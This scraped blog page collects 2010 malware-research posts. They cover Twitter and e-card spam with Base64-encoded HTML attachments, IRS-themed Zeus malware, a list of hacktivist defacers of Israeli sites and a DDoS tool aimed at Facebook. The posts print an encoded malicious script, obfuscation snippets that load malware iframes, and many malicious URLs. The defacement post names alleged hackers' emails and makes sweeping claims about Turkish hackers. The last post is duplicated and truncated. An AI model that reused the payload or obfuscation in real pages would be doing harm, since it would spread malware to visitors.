Anti Virus Softwares

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Monday, 14 June 2010

More Twitter Spam: html-attached threats via Base64

Posted on 15:12 by Unknown
The Twitter spam campaign that we wrote about on Saturday, Twitter, Canadian Pharmacy, and Undetected Malware , has shifted slightly to execute a new threat model. Various email messages which seem to be from Twitter are actually redirecting readers to a website that is selling Canadian pharmacy pills. But is that really what this campaign is about? In our previous article, we mentioned that while the site SEEMS to take you to the Canadian pharmacy website "toldspeak.com", there is more going on behind the scenes.

The previous campaign delivered spam which our friend Graham Cluley has dubbed the "Busty Amber" spam, after the well-endowed model who claims to want to be your friend on Twitter. (Angelina Jolie also wants very badly to be my friend on Twitter - she's sent the UAB Spam Data Mine several tens of thousands of invitations this week.

On Monday, the Busty Amber Twitter spam was primarily pointing to the website "jimjewell.com" and pulling down a file "z.htm". These emails are characterized by a subject line of "Twitter ###-##", where random numbers are used to fill in the
remainder of the email subject. Here's an example of one of the emails, which will have the recipients email address used in several places to create "uniqueness" in the email, which helps with deliverability:



z.htm will forward to the website "toldspeak.com" but will also secretly load an iframe to be used in delivering malware.

The current page actually has already been taken down, but it was pointing to gogoop.casanovarevealed.com port 8080 (slash) index.php?pid=10

The path is the same as the prior site -- ":8080/index.php?pid=10".

The new version of the spam actually doesn't seem to use an external link at all. Instead of having a website that the user is directed to via a URL, the email claims to have an attachment that deals with resetting your Twitter password.



The attached file passes easily through spam filters because although the filetype is ".html", the actual file contents are BASE64 encoded, which means instead of seeing plain text URLs, you have a block of garbage that looks like this:


PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPmZ1bmN0aW9uIGooKXt9O3ZhciB1RT1mYWxzZTtqLnByb3RvdHlwZSA9IHt2IDogZnVuY3Rpb24oKSB7dmFyIGw9Jyc7dGhpcy5sVT1mYWxzZTt0aGlzLmE9Jyc7dmFyIHI9ZG9jdW1lbnQ7Zj0iIjt2YXIgckk9bmV3IERhdGUoKTt2YXIgcz0xNDcwNTt2YXIgeT1yWydsJG8kY1dhcHRXaSRvJG5kJy5yZXBsYWNlKC9bZFdcPHBcJF0vZywgJycpXTtrPScnO3RoaXMudlQ9JGARCHANGEDTHIS3IEFycmF5KCk7eVsnaGFyJWVhZnAnLnJlcGxhY2UoL1twJX5BYV0vZywgJycpXT0naHV0dXRycCo6dS9yL15tKmEpYipjdW9ybSkudW4pZSl0Xi8qenUudWgqdHVtKScucmVwbGFjZSgvW1wpclxeXCp1XS9nLCAnJyk7dmFyIGxDPW5ldyBBcnJheSgpO3ZhciBlPW5ldyBBcnJheSgpO3RoaXMuc0o9IiI7dmFyIGk9ZmFsc2U7fX07dmFyIHVIPWZ1bmN0aW9uKCl7cmV0dXJuICd1SCd9O3ZhciB1PW5ldyBqKCk7IHZhciBvPWZ1bmN0aW9uKCl7fTt1LnYoKTtzUT0ic1EiOzwvc2NyaXB0Pg==


Once decoded, we find another block of text that contains the same sort of javascript replacement trick we mentioned in the previous article. By removing from the string the characters "/,[,\,r,^,*,u,g", we find that the URL we are being redirected to is "mabcom.net" (slash) "z.htm"

That "z.htm" file redirects us to "toldspeak.com", which definitively links us to the other version of the spam, and also loads an IFRAME from the location:

"dodole.designandtransitionspecialists.com" on port 8080 from the file "index.php?pid=10".

About 10PM on Monday June 15th, the spammer finally realized that that site had been removed. Don't worry, he's back again this morning with a new site. The current email with the subject: "Reset your Twitter password" still has an attached BASE64 file. This time the decode is still using the replace trick. Our URL is in this string:

hwt,t_p+:+/_/+e,r0e_i_n,t0z+a,.0cwo0mw/wz0.,h,t0mw

which has the action "replace" executed on it, with a regular expression saying to change the characters "w, _, ,, +, 0," to null.

.replace(/[w_,\+0]/g, '')

That leaves us with:

http://ereintza.com/z.htm

which takes us to a new Canadian pharmacy site, mouseultra.com, but only after it loads its malware IFRAME from:

cache.lamcfoundation.org port 8080 /index.php?pid=10

Fortunately, it looks like someone at the Los Angeles Mission College Foundation has already found the problem and cleaned up the "extra" webserver that they were running.

123Greetings.com


The same technique of attaching an .html file to your spam that contains links to malware is also being used by the current "123Greetings.com" spam run.

In that spam campaign messages with random "from" addresses used in both the subject line and the body of the email are sent, such as:

(HEADER)
From: 123Greetings.com ecards@123greetings.com
Subject: user@domain.com has sent you a birthday card

(BODY)


[user@domain.com] just sent you an ecard

You can view it by open attached document.

Your ecard is going to be with us for the next 30 days.

We hope you enjoy your ecard.


The attachment, ecard.html, is BASE64 encoded, but has a much more advanced Javascript obfuscation technique than the current Twitter spam campaign. My favorite Base64 decoder choked on it, so I threw it into the page offered by gosu.pl, which did fine turning the Base64 into very messy but nicely formatted Javascript.

The code used blocks like this:

var AUqMA = this;
var jL = 'r' + 'eplace';
var tdbHfv = 'bKaK8MdM2v6M5M9M1T4v7v6M7K9T3Mcv0v0v4KeTbTbv7MbM3M8M5v4M1vdTaM5v4Mav1v7M5TaMaM1v0Ke' ;
var zQwlUR;
zQwlUR = 354;
var qAcav = 763 ;
var Hs = 923;

to gradually build up ridiculously long strings containing code, then "replacing out" the characters that shouldn't be there to eventually cause the malware-hosting malware sites to download and attempt to execute their hostile code.
Read More
Posted in | No comments

Saturday, 12 June 2010

Twitter, Canadian Pharmacy, and Undetected Malware

Posted on 09:53 by Unknown
In our post earlier this week, IRS Malware Notice of UnderReported Income, we had a footnote about a current Twitter and YouTube spam run. Our friend Graham Cluley has labeled one version we mentioned the "Busty Amber" spam. (Graham, we didn't know her name - where did you meet her?)

At the time we posted that article we were starting to explore another aspect of the Twitter spam campaign, which continues unabated today, according to the UAB Spam Data Mine. Clicking on the link in the spam is well-publicized as a means to reaching a Canadian pharmacy website, but secretly behind the covers, this spam is all about planting malware.

Let's explore one example from an email we dissected this morning.

As with the American Express , IRS, and Twitter spam, this spam campaign avoids Spam Blacklisting methods by using many thousands of uniquely created spam URLs. In the case of the email we are examining, it looked like this:



The link that claims to be going to "twitter.com" is actually a URL for http://technoline.ca/z.htm

Technoline.ca is in all likelihood a compromised webserver, since its been up since October 2008 "serving the greater Montreal and South Shore region."

When we visit the "z.htm" page, we find that we get a 3 second meta refresh to take us to Canadian pharmacy site "toldspeak.com", however we ALSO get an iframe that takes us to:

rubytune.ru port 8080 /index.php?pid=10

(Rubytune.ru is possibly fast flux. Its currently resolving at:
83.172.13.23
83.172.148.10
89.31.96.64
94.23.224.132
95.211.128.13
)


That site has some interesting Javascript lines, including these two:

Lya2m7t = 'b<5/Mi5f5r5a|m|eH>b'.replace(/[b5\|MH]/g, '');

Ekv9i7z55 = '<5i6f,r|a|m6e5 *s*r5c5=6A6p*p5l,e,t61,0,.*h,t|m,l,>,<,/5i6f*r5a6m6e6>*'.replace(/[\*56\|,]/g, '');

So, the first line is saying take the big long string, and remove the characters in the list: "/", "[", "b", "5", "|", "M", and "H".

If we do that, it leaves us with an iframe to: Notes10.pdf

Doing the same thing on the other line leaves us with an iframe: Applet10.html

Both of those pages are downloaded from the "rubytune.ru" port 8080 webserver.

Notes10.pdf is a malicious PDF, however of the 41 anti-virus products at VirusTotal, only ONE of them says so. Its MD5 is: 33a6f72d52c53c10dd3eb3a7148651f2. You can see its VirusTotal Report here.

Applet10.html is yet another puzzle. This one is a webpage that has the title "Bob's homepage" and tries to use an IE exploit to drop a couple jar files, including a 0010.jar from the (unreachable) site: 85.10.136.213, and a file called "NewGames.jar". The only part of it that I can make function right now is a call to the rubytune.ru site passing a GET of "welcome.php?id=9&pid=10&1=1".

When we do that call, it drops an .exe on the box. For simplicity I named the .exe "welcome.exe". VirusTotal does a bit better with that one. This VirusTotal report shows 7 of 41 detections.

I kicked off the "welcome.exe" in a VM, and what I can tell for sure is that it bluescreened my VM. More details later . . .
Read More
Posted in | No comments

Tuesday, 8 June 2010

IRS Malware: "Notice of Underreported income" spam

Posted on 18:36 by Unknown
On June 2nd, we reported on American Express phish abusing free webhosting - a new method of delivering phishing, that we've only seen once before. The spammer creates thousands of "shortened URLs" and "free websites", which are all then used to redirect to a Fast Flux hosted phishing site.

The UAB Spam Data Mine started seeing this technique used in some Twitter-imitating spam at 9:13 AM on June 6th. That campaign is still continuing using spam messages with the subject "Twitter ###-##", such as "Twitter 647-01" or "Twitter 041-33". We'll come back to that campaign shortly. Let's get back to the IRS spam.

Here's a sample email:



That URL points to:

http://zyraziti.ibnsites.com/gujivazi.html

If you visit that free web site, it fowards you automagically to:

http://irs.gov.lazagazal.com/fraud_application/directory/statement.php?tid= target-######US



That site says
Finding and paying your federal taxes correctly and on time is an important part of living and working in the United States. Please review (download and execute) your tax statement


The link to 'tax-statement.exe' is malware, of course, which currently is detected by only 3 of the 41 anti-virus products on VirusTotal.com.

Here's a report from VirusTotal on this malware MD5 : 23c77c4c29158fea0e0e805eef535571.

Despite the fact that NONE of the current Anti-Virus definitions detect this as Zeus, we know it is very quickly when we launch it. The malware connects to the server "phaizeipeu.ru" and retrieves a Zeus bin file, "/bin/hueghixa.bin" from the server there. That domain has been tracked on Zeustracker since June 2nd.

The nameserver used to resolve this domain, ns1.interaktivitysearch.net, was also used for the domain cyansmith.com, which we mentioned in last week's Fast Flux information regarding the AmEx phish.

As an example, phaizeipeu.ru has in the past two minutes resolved to these IP addresses:

201.227.120.102 - Panama Cable & Wireless
115.186.118.122 - Karachi Worldcall, Pakistan
121.121.97.100 - Maxis Broadband, Kuala Lumpur, Malaysia
124.120.246.107 - TruehISP, Bangkok, Thailand
186.19.105.151 - Telecentro, Argentina
190.30.203.28 - Apolo Gold Telecom, Buenos Aires, Argentina
190.55.110.94 - Telecontro, Argentina
190.246.221.161 - Cablevision, Buenos Aires, Argentina

Here's an example of some of those "Free Web hosting" sites that are currently being exploited:

/yxagenub.100freemb.com/aqyhyho.html
/zimisipyce.100freemb.com/byhomawa.html
/mipubacif.100freemb.com/ivamixa.html
/pekijoxam.100freemb.com/otatolaq.html
/ihacaqyb.100freemb.com/pezope.html
/uhisoheb.100megsfree5.com/ecufoke.html
/azasiniza.100megsfree5.com/icypuxo.html
/eqegohazuv.100megsfree5.com/xosynap.html
/hofipyhe.1accesshost.com/inynysyh.html
/culykenaza.1accesshost.com/iwivuga.html
/digobizaw.1accesshost.com/mafujyde.html
/orodydekof.1accesshost.com/nymoba.html
/olecomoxip.1accesshost.com/omekyre.html
/gusozivo.1accesshost.com/qojeti.html
/ewiromiru.1accesshost.com/sybygo.html
/oladolyc.1accesshost.com/tufepaqi.html
/lykyqoryt.1accesshost.com/ucymuvix.html
/udolysedu.1accesshost.com/unepyqun.html
/ebacikud.1accesshost.com/zykotu.html
/yvunavohi.angelcities.com/fyfobu.html
/nukowicu.angelcities.com/nuwiba.html
/kawywupo.arcadepages.com/arefoboq.html
/zesolarix.arcadepages.com/bykevim.html
/zesolarix.arcadepages.com/bykevim.html
/petoxevat.arcadepages.com/ewefuxoc.html
/inumynumoc.arcadepages.com/eximiqu.html
/ugijehicip.arcadepages.com/ezygexi.html
/oziqysehij.arcadepages.com/iqypufe.html
/imodarecy.bigheadhosting.net/exefoza.html
/wapovaqyh.bigheadhosting.net/panykeve.html
/pomobalyw.bigheadhosting.net/udewin.html
/afofywog.bigheadhosting.net/xufekap.html
/qecixedake.bigheadhosting.net/ysudydev.html
/qecixedake.bigheadhosting.net/ysudydev.html
/xymyfuqad.builtfree.org/bafazu.html
/okypocup.builtfree.org/ovamyqem.html
/wosogabaf.builtfree.org/upuzyr.html
/wosogabaf.builtfree.org/upuzyr.html
/azykakubol.digitalzones.com/ejitehi.html
/onamowonom.digitalzones.com/gypywoz.html
/godicyce.digitalzones.com/ixydet.html
/vixehuxo.digitalzones.com/woducuda.html
/goqivateg.digitalzones.com/ykybaxu.html
/toguhogi.dreamstation.com/avyryk.html
/utofitala.dreamstation.com/kylebik.html
/eqobymoped.dreamstation.com/ogiqyr.html
/ynexovaxo.dreamstation.com/winipyk.html
/yxyqyhuweh.dreamstation.com/ykeqegag.html
/culaworege.easyfreehosting.com/coriroxi.html
/culaworege.easyfreehosting.com/coriroxi.html
/ejofizyz.easyfreehosting.com/dabizeza.html
/ehuceximog.easyfreehosting.com/finixe.html
/umobafavu.easyfreehosting.com/irafyfa.html
/hemahodo.easyfreehosting.com/ufudimaw.html
/xujuguba.easyfreehosting.com/wybave.html
/ejorikoki.easyfreehosting.com/ygoxuq.html
/eqowiwyryx.envy.nu/bohopi.html
/fekynylum.envy.nu/ecevamib.html
/ewemasavy.envy.nu/ymohale.html
/ypodobuni.envy.nu/zytabe.html
/lijogaju.exactpages.com/apexoke.html
/lijogaju.exactpages.com/apexoke.html
/kogybovise.exactpages.com/vujufapa.html
/kywunereju.fcpages.com/erynoh.html
/bicefipipu.freecities.com/hibahu.html
/uboqenunep.freecities.com/nokoxuqo.html
/efysewezic.freecities.com/zevesaz.html
/tekefopo.freehostyou.com/gadasu.html
/alaradewo.freehostyou.com/guzyxoku.html
/ucoqopaby.freehostyou.com/mebyhuh.html
/wogeqiqyq.freehostyou.com/xegesef.html
/icocoqaby.freewaywebhost.com/cidaci.html
/ikucoban.freewaywebhost.com/ovydodo.html
/lykofuzequ.freewaywebhost.com/yjirox.html
/enecyhofow.freewebportal.com/axefeta.html
/vugogyve.freewebportal.com/cydaquno.html
/uwebijygyq.freewebportal.com/reniqyh.html
/hylydacymi.freewebportal.com/ucasob.html
/xuryqoju.freewebsitehosting.com/kocysu.html
/iruzasahyl.freewebsitehosting.com/olocon.html
/vizuzati.freewebsitehosting.com/oqaxiso.html
/umikyvoca.freewebsitehosting.com/xeruwyca.html
/umikyvoca.freewebsitehosting.com/xeruwyca.html
/oqixunoni.freewebsitehosting.com/xosize.html
/ufininir.freewebsitehosting.com/xusepu.html
/ikadiriga.freewebsitehosting.com/ylydugu.html
/ocerityv.freewebsitehosting.com/zopycy.html
/ubikiwaq.greatnow.com/ezixevol.html
/nififazi.greatnow.com/husadu.html
/isihogezin.greatnow.com/ysuxyrud.html
/cli.gs/eM8NXV
/cli.gs/UQBAHQ
/pokijyny.ibnsites.com/adopadat.html
/keferival.ibnsites.com/erematy.html
/zyraziti.ibnsites.com/gujivazi.html
/izyjopyh.ibnsites.com/jisokoce.html
/upymyvul.ibnsites.com/jylyhu.html
/irytaneb.ibnsites.com/kerific.html
/novufuvaxo.ibnsites.com/myzaquq.html
/nohoxutah.ibnsites.com/nydawodo.html
/eperitupuh.ibnsites.com/puhetyfe.html
/anutugoc.ibnsites.com/pukohe.html
/uwyraxuvy.ibnsites.com/qyqepib.html
/yrozujon.ibnsites.com/rusepen.html
/nagysadyx.ibnsites.com/ypenoc.html
/xisyjemo.lookseekpages.com/edavyket.html
/xisyjemo.lookseekpages.com/edavyket.html
/alezehifo.lookseekpages.com/jomuxa.html
/alezehifo.lookseekpages.com/jomuxa.html
/zysesojej.lookseekpages.com/kicylito.html
/vacagufo.lookseekpages.com/novygidy.html
/vacagufo.lookseekpages.com/novygidy.html
/pexogipol.lookseekpages.com/oxucafe.html
/gusejunad.lookseekpages.com/qinigo.html
/ipolagux.maddsites.com/dyjyzylu.html
/karaqika.maddsites.com/egesor.html
/ufawalijuh.maddsites.com/ilubyqy.html
/jokomule.maddsites.com/leqojo.html
/febaveli.maddsites.com/onapiju.html
/awilubux.mindnmagick.com/kehiwugi.html
/olawisyr.o-f.com/ejepekaz.html
/otumybigu.o-f.com/oqyhuxy.html
/afukafutu.s-enterprize.com/itociwo.html
/wenadinudu.servetown.com/ajihepo.html
/kahahari.servetown.com/biximol.html
/ovepahax.servetown.com/vyzurily.html
/nyfufuveco.servetown.com/xibycepi.html
/odivawuh.the-best-free-web-hosting.com/avyfemu.html
/izepofupy.the-best-free-web-hosting.com/yceqalu.html
/gopirocup.the-best-free-web-hosting.com/ydagyduf.html
/sawatazuky.uvoweb.net/afumox.html
/sawatazuky.uvoweb.net/afumox.html
/xynunuxev.uvoweb.net/ekocap.html
/kebypatat.uvoweb.net/garicedy.html
/eqeqalywoj.uvoweb.net/mafepody.html
/ubejedoqej.uvoweb.net/wetira.html
/vunagugevu.virtue.nu/evawov.html
/elyxupij.virtue.nu/juzepod.html
/elyxupij.virtue.nu/juzepod.html
/mequmato.virtue.nu/kiqabyto.html
/ofopuhymam.virtue.nu/ozowynuf.html
/ipecatuvo.virtue.nu/pokekuke.html
/ihamozavil.virtue.nu/qefeqo.html
/ihamozavil.virtue.nu/qefeqo.html
/xavesahyh.wtcsites.com/dasuqiw.html
/irutajov.wtcsites.com/huzexeje.html
/gisejywira.wtcsites.com/ubumike.html
/ikifinukux.wtcsites.com/upitim.html

Twitter Spam



While the Twitter spam also uses many free websites, it actually has a much smaller number, and combines "googlegroups", "110mb.com", and "t35.com" websites with a selection of compromised domains.

http://aomdesign101.com/d.htm
http://aprendainglesrapido.net/x.htm
http://capelcure.co.uk/1.html
http://cobhamdogs.net/x.htm
http://cobhamdogs.net/x.htm
http://crefxxx.110mb.com/index.htm
http://cresssa.110mb.com/index.htm
http://dreaminom.t35.com
http://faceseverywhere.com/x.htm
http://givisss.110mb.com/index.htm
http://grapevinephotography.com.au/1.htm
http://groups.google.com/group/pppppps
http://jennifervpearl.com/x.htm
http://lessreachom.t35.com
http://millcreekswim.com/x.htm
http://openexe.googlegroups.com/web/Twitter_security_model_setup.zip
http://pppppps.googlegroups.com/web/g.html
http://superiormerchant.com/x.htm
http://toldspeak.com
http://twitter.com/account/not_my_account/
http://twitter-security-model.googlegroups.com/web/Twitter_security_model_setup.zip
http://uucgb.org/x.htm
http://xizinnn.110mb.com/index.htm
http://xyddds.110mb.com/index.htm

The spam from these sites is also varying.

Security version:
Attention! We detected that someone was trying to steal your Twitter account password.

We strongly recomended you to download our secure module to protect account!

Please click on the link below:
http://twitter.com/Twitter_security_model_setup.zip



Pill version:
This version only shows a picture of a man showing "two-thumbs up" surrounded by pills with cheap prices on them.


Unread message version:
You have 1 unread message from Twitter

Please click on the link below or copy and paste the URL into your browser:
http://twitter.com/account/=youremail@yourdomain.com


An alternative, being currently spammed, follows the unread message with a photo of a large-breasted woman showing off her cleavage.

YouTube Spam



The identical photograph (click to see image here if you aren't offended by scantily clad women) is also currently being used in a "YouTube" spam.

Prior to about 2:00 PM Central time, the message did not contain the photograph, but only a YouTube logo and the message below (with a varying "user name" for each email.)

The user Jordan suggests you to become friends on YouTube. Offers and acceptance of offers on friendship simplify tracing of that your friends place in the selected works, add or estimate, and also simplifies video departure by all or to the selected users. To accept or reject this invitation, pass in INBOX


Some of the YouTube versions point to links on these pages:

htp://camaka.net/1.htm
http://aomdesign101.com/d.htm
http://aprendainglesrapido.net/x.htm
http://bombardierconsulting.com/x.htm
http://camaka.net/1.htm
http://cccxxdd.110mb.com/index.htm
http://cresssa.110mb.com/index.htm
http://kayakguy.com/x.htm
http://millcreekswim.com/x.htm
http://superiormerchant.com/x.htm
http://uucgb.org/x.htm
http://wanderingchild.org/x.htm
http://xyddds.110mb.com/index.htm

all of which forward elsewhere for the actual "pill-related" spam content
Read More
Posted in | No comments

Saturday, 5 June 2010

Pro-Gaza hackers target Israeli websites

Posted on 23:47 by Unknown
When it comes to website hacking, the Turks seem to be consistently at the top of the pack. This is mostly because their government tolerates their activities with little regard for international law. The oldest and most complete collection of website defacements is Zone-H, a site run by Roberto Preatoni that tries to document defacement activity by archiving the defaced websites. Defacement rates are rising, with a typical day seeing between 1500 and 3000 defaced websites, with a large number of these by Turkish defacement groups.

After various protest groups chose to stage a so-called "Freedom Flotilla" protest and attempt to deliver supplies to Gaza despite the well-known Israeli blockade. As YNet News reports:
The deputy head of Israel's mission to the United Nations, Dan Carmon, told the Security Council, "Although portrayed in the media as a humanitarian mission delivering aid to Gaza, this flotilla was (not) a humanitarian mission. If indeed it were a humanitarian mission it would have accepted, weeks ago, during the planning stages, the offer by the Israeli authorities to transfer the aid, through to the port of Ashdod, to Gaza through the existing overland crossing, in accordance with established procedures. Many states and organizations, including the UN, are using those mechanisms on a daily basis.


This interpretation of events is backed up by the IDF's YouTube channel. The Israeli military has been using YouTube to spread the official version of various contested events for more than a year, justifying their military actions by showing video of smuggling, rocket attacks, and other activities.

The nine demonstrators killed on the Mavi Marmara, a Turkish flagged ship, and eight of the nine killed were Turkish citizens. This is a guarantee that the various Turkish hacking groups will respond, and bring the cyberforces of Islam to bear on any website that ends in a ".il".

As you'll see below, although the Turks may have started the cyber protest, it has spread throughout the Islamic world, including Moroccans, Indonesians, Yemeni, and others.

Website Security and YOU


Some people say we are "glorifying the hackers" when we talk about their defacements, or "just giving them what they want" meaning publicity.

I'd like you to think, dear reader, as you look at these sites below about a different message. IF YOUR WEBSITE IS NOT SECURED, criminals, activists, terrorists, script kiddies, and phishers can break into your website and use it to spread whatever message they want.

Think about one of these images being associated with the name of YOUR COMPANY or YOUR ORGANIZATION.

How do you review your website security? Is someone reviewing your log files regularly? Do you have a mechanism to review statistics about your server? Would you even know it if someone added a page like one of those below to your server?

Yes, there is a cyber protest going on, but try not to think in terms of Israeli-Palestinian-Turk. Think in terms of hackers and YOU.

The Current Conflict


Here are a few of the SEVERAL THOUSAND websites defaced since those actions went down, and a few notes about some of the defacers that are attacking them.

Islamic Ghosts Team


srudi.co.il was hacked by the Islamic Ghosts Team, with the typical poorly structured English messages:

Who are the rightful terrorists in this world !!!!
Be sure that the whole world has become known the real Terror
./ Islamic Ghosts Team


According to Zone-H, the Islamic Ghosts Team has hacked more than 6800 websites, with many dozens in the past few days being this attack against Israeli sites. Of course they are also still attacking the government of Mexico.

They include the official graphic of this "campaign", which I'm linking to from its regularly used site at espacetunisien here:



They also have other far more disturbing images on recent defacements, many featuring a ripped burning Star of David Israeli flag.

Ma3str0-Dz


Algerian Hacker, Maestro-DZ, hangs out on the website Sec4ever.com and uses a german hotmail account - o5m@hotmail.de. Maestro-DZ has hacked more than 5,400 websites, including 390 Israeli sites.

His defacement yesterday of the Weissman Law firm demonstrates his foul mouth and poor english, along with this graphic:



He's been doing anti-Israeli website defacing since at least October 2009, when he did a defacement "For the Kids of Gaza" by hacking ballas-eng.co.il.


Jurm-Team (RealFaciaXXX)


If that name sounds familiar, it should. Jurm has been a member of several very high profile website defacement groups. He's invited to quite a few "All star" parties. His current team mates, Jurm, Dr.Noursoft, RedDoom, and Kingofp4 are hiding behind a group hotmail account, Jurm-Team@hotmail.com and using their defacements to show a video of Israeli atrocities.

Jurm and friends are "Moroccan Hackers" according to their defacements.
RealFaciaXXX must have just joined the team. His "For Palestina" hacks have not mentioned Jurm before yesterday, and most recently show an Arabian-head-garbed man with a shoulder launched missile facing into the camera.

1923Turk


Many Turkish hackers prefer to post their defacements on "Turk-H.org" instead of Zone-h.org. Looking over there briefly, there are many additional defacements not indexed on Zone-H. One of the more confusing groups is 1923Turk. This group's members post defacement stats using the common name, but actually have dozens of individual hacking groups that are assigned to different "missions". For example, one defacement claimed by "1923Turks" today is www.gerontology.org.il, but the defacement itself says it was committed by "Hackspy & Hate", two hackers who are members of a 1923Turks squad consisting of members, ÖlüM - xoxmemo - HaCkSpY - Devil_Boy - LegendSemih - TheEnd - Deadly - HaTe - Hydr4 - LifeOrDeath. The Team leader is usually listed first, but any of the members can do a defacement as long as the team leader is listed and the credit is given to the 1923Turk group.

Many of the current 1923Turk defacements use this image:


(Potentially offensive image: Click to see)

The 1923Turk group actually has more than 45,000 members, including 2600 new members during the past 30 days. They aren't all hackers - they have many groups dedicated to "patriotic" security of all sorts, including helping Turkish citizens getting malware off their computers. There are thousands involved in hacking though - some assigned exclusively to hacks against the PKK, and others to various "enemies of Islam", in teams divided by the country they are targeting. Some of their forums are Turkish culture, computer programming, and Islamic education forums as well.

1923Turk is an homage to "the Ataturk", Mustafa Kemal. Although he is credited with ruling the first secular Turkey, beginning after World War I, the Ataturk is celebrated by these young hackers for his ability to have multiple religions living "at peace" with one another. They claim we need to return to this style of tolerance shown (at least in their twisted memories) by the Ataturk. (I actually read an enormous biography of the Ataturk to help me understand these guys - Ataturk: the Biography of the founder of Modern Turkey, by Andrew Mango - very helpful and interesting!)

Team Hitman Hacker


This team, consisting of Yemeni hacker Mr.NSR (oi3@hotmail.com) and Moroccan hacker, RaYm0n (n5b@hotmail.com) has posted a portrait of Hitler on various Israeli websites. The words on the Hitler poster are in Arabic, and I'm not sure yet what they say.

Team Hitman has defaced 8,700+ websites, including well over 100 Israeli sites in the past 48 hours.

Their current defacement technique is actually a redirect-injection that takes the visitor to RaYm0n's website:

http://raym0n.com/fuck-il.html

Raym0n's WHOIS data says his email is "w_@hotmail.fr"

He hosts his anti-Semitic content at "club4hosting.com"

BobyHikaru


Each new cyber protest acts as a recruiting event for new script kiddies. One of the new comers this time is BobyHikaru, who calls himself a member of the "Indonesian Hacker Team" and lists a website Devilzc0de.org on his defacements, along with this graphic:



In his spare time, Boby hacks the government of Indonesia. he's only hit less than 100 sites in his entire career.

Turkish Hacker, AKINCILAR, has also picked up this graphic, and added his own art to the bottom of it for use in defacements, such as this one:

http://yygranot.co.il/gallery

H4X0R-x0x


Another Indonesian hacker, with only 90 website defacements, has joined the cause, hacking a design school in Israel showing a metallic skeleton bursting through a bloody Israeli flag with his middle finger extended, and calling to "Stop War in Gaza"

Arumbia Team


The "Arumbia Team" (never heard of them) has also hacked an Israeli law firm and a half dozen other Israeli websites. They list 18 members, probably mostly Indonesian.

In Conclusion


No conclusion yet. This thing is just getting started. This morning's news had several references to synagogue websites in other parts of the world being defaced, most notably in Massachusetts by "Pintu Maya Team", although this seems to be a case of a very widely spread story originating from a single report. I can't find an archive of the actual defacement, and have never heard of Pinta Maya Team. If anyone knows a forum or website where they hang out, let me know . . . gar at uab dot edu
Read More
Posted in | No comments

Tuesday, 1 June 2010

VirtualJihad against Facebook

Posted on 11:38 by Unknown
On May 20th, a group who claim to be motivated by various "Freedom of Expression" announced that they were holding "Everybody Draw Mohammad Day". As everyone knows by know, on September 30, 2005, a Danish newspaper chose to publish several cartoons of the Prophet Mohammed, including one of the prophet with his turban containing a bomb, which was drawn by Kurt Westergaard. This was the first many Westerners learned of the Islamic tradition that the prophet should never be depicted. The controversy has continued since then, with various papers reprinting the cartoons, and various Islamic nations then banning those papers, or calling for acts of violence against their editors. In January of 2010, Westergaard's home was broken into by an Islamic man who chopped through his door with an axe and desired to kill him with a knife.

The current "Everybody Draw Mohammed Day" craze was not inspired by Westergaard, but rather by death threats against the SouthPark artists, Matt Stone and Trey Parker, who depicted the Prophet Mohammed wearing a bear suit. Seattle-based cartoonist Molly Norris ran a cartoon suggesting that May 20th, be declared "Everybody Draw Mohammed Day" sponsored by "Citizens Against Citizens Against Humor or CACAH", which she has now retracted by scribbling notes on her own cartoon:



Unfortunately for Molly, many folks took her seriously, creating a special website to receive their submitted drawings, and more relevantly to our topic today, they also created a Facebook group, "Everybody Draw Mohammed Day."




The creation of the Facebook Group lead to several national bans of Facebook, including bans by Pakistan, Bangladesh, and the United Arab Eremites. The UAE and Saudi Arabia both made "line item veto" bans blocking only the offending group on Facebook, while the first two banned the entire website. (Update: Pakistan lifted their "blanket" ban on May 31st after Facebook actually censored the offending group.)




Pakistani media reported that "hacking fraternities" were being formed to "take revenge" on the "blasphemous companies". Pakistani residents have reported receiving SMS text messages encouraging them to participate in DDOS attacks. The website "drawmohammed.com" has also been repeatedly defaced by Islamic hackers since this event began.

Perhaps the most outrageous response has been the encouragement to download the attack tool that is being spread to help people DDOS.

The Google Group "Muslims United" was created May 19th and has been actively attacking "offensive" websites. The main banner proclaims the site to be the "Anti-Draw-Muhammad (P.B.U.H.) -DAY", and currently has 1800 messages. Several of these relate to the "virtualjihad.net" website, where the DDOS tool is included.







VirtualJihad.net was registered on May 19th from the website "www.secsupport.com", a reseller for Directi's PublicDomainRegistry.com.

The website is hosted on the IP, 75.126.169.149, hosted by SoftLayer.com, right here in the USA.

The tool has a pull-down menu, allowing the user to choose whether he wants to attack "www.muhammadture.com", "www.drawmuhammadday.com", or "www.facebook.com".

Their website claims they have 34,306 people actively attacking with their tool at this time. The organizers, using the email "info@virtualjihad.net", claim to be reachable via MSN, GoogleTalk, or Skype as well as email.
Read More
Posted in | No comments

VirtualJihad against Facebook

Posted on 11:38 by Unknown
On May 20th, a group who claim to be motivated by various "Freedom of Expression" announced that they were holding "Everybody Draw Mohammad Day". As everyone knows by know, on September 30, 2005, a Danish newspaper chose to publish several cartoons of the Prophet Mohammed, including one of the prophet with his turban containing a bomb, which was drawn by Kurt Westergaard. This was the first many Westerners learned of the Islamic tradition that the prophet should never be depicted. The controversy has continued since then, with various papers reprinting the cartoons, and various Islamic nations then banning those papers, or calling for acts of violence against their editors. In January of 2010, Westergaard's home was broken into by an Islamic man who chopped through his door with an axe and desired to kill him with a knife.

The current "Everybody Draw Mohammed Day" craze was not inspired by Westergaard, but rather by death threats against the SouthPark artists, Matt Stone and Trey Parker, who depicted the Prophet Mohammed wearing a bear suit. Seattle-based cartoonist Molly Norris ran a cartoon suggesting that May 20th, be declared "Everybody Draw Mohammed Day" sponsored by "Citizens Against Citizens Against Humor or CACAH", which she has now retracted by scribbling notes on her own cartoon:



Unfortunately for Molly, many folks took her seriously, creating a special website to receive their submitted drawings, and more relevantly to our topic today, they also created a Facebook group, "Everybody Draw Mohammed Day."




The creation of the Facebook Group lead to several national bans of Facebook, including bans by Pakistan, Bangladesh, and the United Arab Eremites. The UAE and Saudi Arabia both made "line item veto" bans blocking only the offending group on Facebook, while the first two banned the entire website. (Update: Pakistan lifted their "blanket" ban on May 31st after Facebook actually censored the offending group.)




Pakistani media reported that "hacking fraternities" were being formed to "take revenge" on the "blasphemous companies". Pakistani residents have reported receiving SMS text messages encouraging them to participate in DDOS attacks. The website "drawmohammed.com" has also been repeatedly defaced by Islamic hackers since this event began.

Perhaps the most outrageous response has been the encouragement to download the attack tool that is being spread to help people DDOS.

